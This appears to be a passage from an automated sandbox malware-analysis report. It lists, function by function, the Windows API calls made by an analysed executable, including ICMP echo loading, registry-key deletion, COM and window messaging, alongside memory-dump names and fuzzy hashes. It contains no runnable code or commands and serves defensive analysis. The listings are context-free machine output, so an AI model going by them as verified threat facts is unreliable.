                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                • String ID: crts
                                                • API String ID: 943502515-3724388283
                                                • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$LabelVolume
                                                • String ID: \VH
                                                • API String ID: 2006950084-234962358
                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetMenuItemInfoW.USER32 ref: 00449727
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                • DrawMenuBar.USER32 ref: 00449761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw_malloc
                                                • String ID: 0
                                                • API String ID: 772068139-4108050209
                                                • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcscpy
                                                • String ID: 3, 3, 8, 1
                                                • API String ID: 3469035223-357260408
                                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                • API String ID: 2574300362-3530519716
                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                • API String ID: 2574300362-275556492
                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                • API String ID: 2574300362-58917771
                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                APIs
                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                • __itow.LIBCMT ref: 004699CD
                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                • __itow.LIBCMT ref: 00469A97
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                APIs
                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
